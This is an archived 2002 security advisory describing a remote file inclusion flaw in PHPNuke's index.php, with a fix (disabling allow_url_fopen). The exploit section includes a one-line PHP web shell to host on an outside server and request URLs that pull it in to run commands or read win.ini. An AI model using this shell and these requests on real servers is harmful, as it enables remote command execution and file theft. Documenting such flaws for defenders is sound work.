TUCoPS :: Web :: PHP :: web5006.htm

PHPNuke - Index.php allows arbitrary PHP remote command execution
17th Jan 2002 [SBWID-5006]
COMMAND

	Index.php allows arbitrary PHP remote command execution

SYSTEMS AFFECTED

	PHPNuke v??

PROBLEM

	\"Nopman\" says :
	

	The flaw  is  in  the  index.php\'s  include  file  feature.  It  allows
	including files like index.php?file=file  It  prevents  users  including
	..\'s  in  URL\'s,  but  it  didn\'t   prevent   users   from   entering
	http://-urls Remember the PHP\'s remote get feature...
	

	 Exploit

	 =======

	

	Upload this file to some free web  space  provider  or  setup  your  own
	server:
	

	<?php

	system($cmd);

	?>

	

	Then just requesting 

	http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al

	will execute ls -al command.

	

	

	 Update (25 Januaru 2002)

	 ======

	

	RoMAnSoft added that the following url would  allow  access  to  win.ini
	file :
	

	http://victimserver/index.php?file=3Dc:\\winnt\\win.ini

	

SOLUTION

	Set allow_url_fopen to off in php.ini

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH